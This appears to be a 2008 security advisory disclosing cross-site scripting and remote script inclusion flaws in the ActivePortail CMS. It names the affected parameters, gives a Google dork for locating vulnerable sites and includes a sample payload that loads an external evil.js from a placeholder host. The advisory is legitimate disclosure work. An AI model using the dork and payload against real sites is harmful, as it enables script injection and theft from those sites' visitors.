ActivePortail suffers from cross site scripting and remote Java inclusion vulnerabilities.
d0149fc8068e3430166cdca90df425b0c543a12c40a3d04124273ceeb51372f3
+================================================================================================+
+ ActivePortail - Copyright AGIIR Network 2007/2008 & XSS - Remote Java Inclusion +
+================================================================================================+
Author(s): Ivan Sanchez
Product: ActivePortail® CMS - Copyright AGIIR Network 2007/2008
Web:http:http://www.activeportail.fr/
Versions: All Version
Date: 14/10/2008
"
ActivePortail® CMS est un outil de gestion de contenu web dynamique,
il permet de créer et exploiter les pages de votre portail internet..."
GOOGLE DORKS:
------------
intext:" Copyright AGIIR Network "
Parameters Affected:
-------------------
1-recherche.php? (from Post)
mot_rech =insert-evil-remote-java.js
2-ged.php? (from querystring)
pkcateg=insert-evil-remote-java.js
(and other parameters are affected.)
Example insert remote file: "><script src=http://site/scripts/evil.js></script>
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+================================================================================================+
+ ActivePortail - Copyright AGIIR Network 2007/2008 & XSS - Remote Java Inclusion +
+================================================================================================+